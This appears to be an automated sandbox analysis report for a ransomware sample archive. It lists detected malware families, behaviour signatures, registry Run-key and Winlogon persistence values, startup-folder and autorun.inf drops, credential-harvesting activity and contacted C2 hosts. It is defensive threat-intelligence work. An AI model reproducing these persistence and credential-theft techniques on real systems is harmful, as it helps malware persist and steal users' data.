Analysis Overview
SHA256
194c7d681f8c905c6f89414ebf06a71f851e38b391bad73902aa4b4e73806a4c
Threat Level: Known bad
The file RNSM00462.7z was found to be: Known bad.
Malicious Activity Summary
Urelas
RedLine
Snake Keylogger payload
RedLine payload
CryptBot payload
Modifies WinLogon for persistence
SectopRAT
Snake Keylogger
NanoCore
CryptBot
SectopRAT payload
njRAT/Bladabindi
AsyncRat
SmokeLoader
Modifies Windows Firewall
Sets file to hidden
Command and Scripting Interpreter: PowerShell
Obfuscated with Agile.Net obfuscator
Deletes itself
Checks computer location settings
Unsecured Credentials: Credentials In Files
Reads user/profile data of local email clients
Reads data files stored by FTP clients
Executes dropped EXE
Drops startup file
Loads dropped DLL
Reads user/profile data of web browsers
Enumerates connected drives
Adds Run key to start application
Accesses Microsoft Outlook profiles
Looks up external IP address via web service
Legitimate hosting services abused for malware hosting/C2
Checks installed software on the system
Checks whether UAC is enabled
Drops desktop.ini file(s)
Accesses cryptocurrency files/wallets, possible credential harvesting
Drops autorun.inf file
Suspicious use of SetThreadContext
Drops file in System32 directory
UPX packed file
Subvert Trust Controls: Mark-of-the-Web Bypass
Drops file in Program Files directory
Drops file in Windows directory
Enumerates physical storage devices
Program crash
Event Triggered Execution: Netsh Helper DLL
System Location Discovery: System Language Discovery
NSIS installer
Uses Task Scheduler COM API
Checks processor information in registry
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
Kills process with taskkill
Modifies registry key
Suspicious behavior: SetClipboardViewer
Checks SCSI registry key(s)
Suspicious use of AdjustPrivilegeToken
Modifies registry class
Suspicious use of WriteProcessMemory
Views/modifies file attributes
Suspicious behavior: GetForegroundWindowSpam
outlook_win_path
Suspicious use of FindShellTrayWindow
outlook_office_path
Scheduled Task/Job: Scheduled Task
Suspicious use of SetWindowsHookEx
NTFS ADS
Suspicious use of SendNotifyMessage
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2024-10-08 19:44
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-08 19:43
Reported
2024-10-08 19:48
Platform
win10v2004-20241007-en
Max time kernel
242s
Max time network
245s
Command Line
Signatures
AsyncRat
CryptBot
CryptBot payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Modifies WinLogon for persistence
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "Explorer.exe HelpMe.exe" | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.PolyRansom.gen-5156718dfda230aa1c3e23d8c623c2403d8ce78321ea0ac3f3debe745e5dbb2a.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "\"C:\\Users\\Admin\\AppData\\Roaming\\JgyFDFhGJgjYGjkjhK\\ORz3qcl5PTvg.exe\",explorer.exe" | C:\Users\Admin\Desktop\00462\HEUR-Trojan.MSIL.Crypt.gen-c9200832c84d4fd612cfbb208530aea3ce086aee1d21baea43277aafe97c1e51.exe | N/A |
NanoCore
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
SmokeLoader
Snake Keylogger
Snake Keylogger payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Urelas
njRAT/Bladabindi
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\netsh.exe | N/A |
Sets file to hidden
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\00462\HEUR-Trojan.MSIL.Crypt.gen-81bd002cd9063ead258f20093a3ba8a0950dc2e6f2e9ab6417dd2e049cb1e7a2.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\tmp1E0F.tmp.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\magek.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\services32.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\svchost32.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\00462\HEUR-Trojan.MSIL.Cryptos.gen-bc7295a0f160c635706426e02f2b91a65f91543438e6fc6c555a0bf6a85a3077.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\00462\HEUR-Trojan.MSIL.Crypt.gen-6cf6715578124129e279c73bcb6d9aaf380aaa71776b07deb242c65e069bb349.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\cmd.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\00462\Trojan-Ransom.Win32.Cryptodef.aoo-960306dc1fc227939790b4242f4e812aef164bda3e7bd3b3a1f22788e65300a7.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\00462\Trojan-Ransom.Win32.GenericCryptor.czo-73385e09346d834147a4b68db0b839c783123b030761a724b8bea5a904039354.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\00462\Trojan.MSIL.Crypt.hvhi-ed25de217ef133fcf5022402c79e4e50fd65455a40680292ea71b50cb8406c17.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\00462\HEUR-Trojan.MSIL.Crypt.gen-bdb748650b1bca9455213265d9a09f9d7666d984cb1e293983e341bd7c7b9421.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\00462\HEUR-Trojan.MSIL.Crypt.gen-c88a94b57c6f59d709e3175c01d7e505df46a825e22f08f860257d48a58f38dd.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\WindowsDefender.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\00462\Trojan.MSIL.Crypt.hvhg-d7127ebc7b687755b514823dfaa010fbdb6fe9772cbc09b82173732d26facad2.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\svchost32.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Rar$EX7.sr77\COM7.EXE | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Blocker.pef-ef519092e635c9662c0cfb2203d7554b0abc28a69ab2a38c53214186dbb0ec20.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\00462\HEUR-Trojan.MSIL.Crypt.gen-eb01cedd82b31373d4c5eb721248a97239efcc247c17823bb5493ed73423bcaf.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\00462\Trojan-Ransom.Win32.GenericCryptor.cys-364e6e208c6074b907cabf8bb826155775e3a9c74044fa0c8d994dfff61d2364.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Desktop\00462\Trojan.MSIL.Crypt.hvhi-ed25de217ef133fcf5022402c79e4e50fd65455a40680292ea71b50cb8406c17.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Java update.exe | C:\ProgramData\DLL32.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Soft.lnk | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.PolyRansom.gen-5156718dfda230aa1c3e23d8c623c2403d8ce78321ea0ac3f3debe745e5dbb2a.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\5e4a8dc8cd9d3a2e42914844f5688d1f.exe | C:\Windows\chromet.exe | N/A |
| File opened for modification | \??\c:\users\admin\appdata\roaming\microsoft\windows\start menu\programs\startup\filename.vbs | C:\Windows\system32\taskmgr.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Java update.exe | C:\ProgramData\DLL32.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Soft.lnk | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.PolyRansom.gen-5156718dfda230aa1c3e23d8c623c2403d8ce78321ea0ac3f3debe745e5dbb2a.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\5e4a8dc8cd9d3a2e42914844f5688d1f.exe | C:\Windows\chromet.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\filename.vbs | C:\Users\Admin\Desktop\00462\Trojan.MSIL.Crypt.bvnw-042b7cf6c616a6534b9167902a0205e001ebda48019570da2566cd65a8a53097.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PDF Reader Launcher.exe | C:\Users\Admin\AppData\Local\Temp\Rar$EX7.sr77\COM7.EXE | N/A |
Executes dropped EXE
Loads dropped DLL
Obfuscated with Agile.Net obfuscator
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Reads data files stored by FTP clients
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Unsecured Credentials: Credentials In Files
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "C:\\Users\\Admin\\AppData\\Roaming\\csrss.exe" | C:\Users\Admin\Desktop\00462\Trojan-Ransom.Win32.Blocker.kgxf-e086f62407490931accde542dd180b115374680ca7c3cee65e796cda8efecda0.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\5e4a8dc8cd9d3a2e42914844f5688d1f = "\"C:\\Windows\\chromet.exe\" .." | C:\Windows\chromet.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\5e4a8dc8cd9d3a2e42914844f5688d1f = "\"C:\\Windows\\chromet.exe\" .." | C:\Windows\chromet.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Update = "\"C:\\ProgramData\\DLL32.exe\" .." | C:\ProgramData\DLL32.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\COM_LOADER = "\\\\.\\F:\\Program Files\\PDF_Reader\\bin\\COM7.EXE" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ServiceHelper = "C:\\Users\\Admin\\AppData\\Roaming\\ServiceHelper.exe" | C:\Users\Admin\Desktop\00462\Trojan-Ransom.Win32.Blocker.kgxf-e086f62407490931accde542dd180b115374680ca7c3cee65e796cda8efecda0.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Google_Update = "C:\\Users\\Admin\\AppData\\Roaming\\GoogleUpdate\\Google.exe" | C:\Users\Admin\Desktop\00462\Trojan.MSIL.Crypt.hvhg-d7127ebc7b687755b514823dfaa010fbdb6fe9772cbc09b82173732d26facad2.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Google_Update = "C:\\Users\\Admin\\AppData\\Roaming\\GoogleUpdate\\Google.exe" | C:\Users\Admin\AppData\Roaming\GoogleUpdate\Google.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Update = "\"C:\\ProgramData\\DLL32.exe\" .." | C:\ProgramData\DLL32.exe | N/A |
Checks installed software on the system
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Desktop\00462\HEUR-Trojan.MSIL.Crypt.gen-c9200832c84d4fd612cfbb208530aea3ce086aee1d21baea43277aafe97c1e51.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Desktop\00462\Trojan.MSIL.Crypt.bvnw-042b7cf6c616a6534b9167902a0205e001ebda48019570da2566cd65a8a53097.exe | N/A |
Drops desktop.ini file(s)
| Description | Indicator | Process | Target |
| File created | C:\Windows\assembly\Desktop.ini | C:\Users\Admin\Desktop\00462\Trojan.MSIL.Crypt.hvhi-ed25de217ef133fcf5022402c79e4e50fd65455a40680292ea71b50cb8406c17.exe | N/A |
| File opened for modification | C:\Windows\assembly\Desktop.ini | C:\Users\Admin\Desktop\00462\Trojan.MSIL.Crypt.hvhi-ed25de217ef133fcf5022402c79e4e50fd65455a40680292ea71b50cb8406c17.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe | N/A |
| File created | C:\Program Files\desktop.ini | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe | N/A |
Enumerates connected drives
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | 2.tcp.ngrok.io | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | 2.tcp.ngrok.io | N/A | N/A |
| N/A | 2.tcp.ngrok.io | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | 2.tcp.ngrok.io | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | freegeoip.app | N/A | N/A |
| N/A | freegeoip.app | N/A | N/A |
| N/A | api.my-ip.io | N/A | N/A |
| N/A | api.my-ip.io | N/A | N/A |
| N/A | api.my-ip.io | N/A | N/A |
| N/A | checkip.dyndns.org | N/A | N/A |
Drops autorun.inf file
| Description | Indicator | Process | Target |
| File created | C:\autorun.inf | C:\Windows\chromet.exe | N/A |
| File created | D:\autorun.inf | C:\Windows\chromet.exe | N/A |
| File created | F:\autorun.inf | C:\Windows\chromet.exe | N/A |
| File opened for modification | F:\AUTORUN.INF | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.PolyRansom.gen-5156718dfda230aa1c3e23d8c623c2403d8ce78321ea0ac3f3debe745e5dbb2a.exe | N/A |
| File opened for modification | C:\AUTORUN.INF | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.PolyRansom.gen-5156718dfda230aa1c3e23d8c623c2403d8ce78321ea0ac3f3debe745e5dbb2a.exe | N/A |
Drops file in System32 directory
Suspicious use of SetThreadContext
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\ProPlusR_OEM_Perp6-pl.xrm-ms | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe | N/A |
| File created | C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.4.8204.0_x64__8wekyb3d8bbwe\AppxBlockMap.xml.exe | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe | N/A |
| File created | C:\Program Files\Microsoft Office\root\vfs\System\FM20.DLL.exe | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\ClickToRun\api-ms-win-crt-convert-l1-1-0.dll | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\api-ms-win-core-datetime-l1-1-0.dll | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe | N/A |
| File created | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxCalendarAppList.scale-125.png | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe | N/A |
| File created | C:\Program Files\WindowsApps\Microsoft.VP9VideoExtensions_1.0.22681.0_x64__8wekyb3d8bbwe\Assets\contrast-white\WideTile.scale-125_contrast-white.png | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe | N/A |
| File created | C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.19071.12548.0_x64__8wekyb3d8bbwe\Assets\ShareProvider_CopyFile24x24.scale-200.png.exe | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019R_OEM_Perp5-ppd.xrm-ms | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe | N/A |
| File created | C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fr\Microsoft.Build.Utilities.v3.5.resources.dll | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\lua\http\js\controllers.js | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe | N/A |
| File created | C:\Program Files\WindowsApps\Microsoft.WebpImageExtension_1.0.22753.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppList.targetsize-36_contrast-white.png.exe | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe | N/A |
| File created | C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalculatorAppList.targetsize-60_altform-colorize.png.exe | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe | N/A |
| File created | C:\Program Files\WindowsApps\Microsoft.YourPhone_0.19051.7.0_x64__8wekyb3d8bbwe\Assets\AppTiles\AppIcon.targetsize-24_altform-lightunplated.png | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe | N/A |
| File created | C:\Program Files\Microsoft Office\root\Office16\LogoImages\OneNoteLogo.scale-140.png.exe | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL090.XML | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe | N/A |
| File created | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\Infragistics2.Win.UltraWinToolbars.v8.1.dll.exe | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe | N/A |
| File created | C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherImages\210x173\9.jpg | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe | N/A |
| File created | C:\Program Files\WindowsApps\Microsoft.MixedReality.Portal_2000.19081.1301.0_x64__8wekyb3d8bbwe\Assets\MixedRealityPortalAppList.targetsize-72_altform-unplated.png | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe | N/A |
| File created | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\MoveToFolderToastQuickAction.scale-80.png.exe | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\ProjectStdXC2RVL_MAKC2R-ul-oob.xrm-ms | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe | N/A |
| File created | C:\Program Files\WindowsApps\Microsoft.People_10.1902.633.0_x64__8wekyb3d8bbwe\Assets\contrast-black\PeopleAppList.targetsize-96_altform-unplated.png | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe | N/A |
| File created | C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\Assets\Logos\Square44x44\PaintAppList.targetsize-256.png.exe | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe | N/A |
| File created | C:\Program Files\Java\jdk-1.8\jre\lib\security\cacerts.exe | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe | N/A |
| File created | C:\Program Files\WindowsApps\Microsoft.ScreenSketch_10.1907.2471.0_x64__8wekyb3d8bbwe\Assets\FileAssociation\FileAssociation.targetsize-16.png | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe | N/A |
| File created | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\HxMailSmallTile.scale-400.png.exe | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\StandardVL_MAK-pl.xrm-ms | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe | N/A |
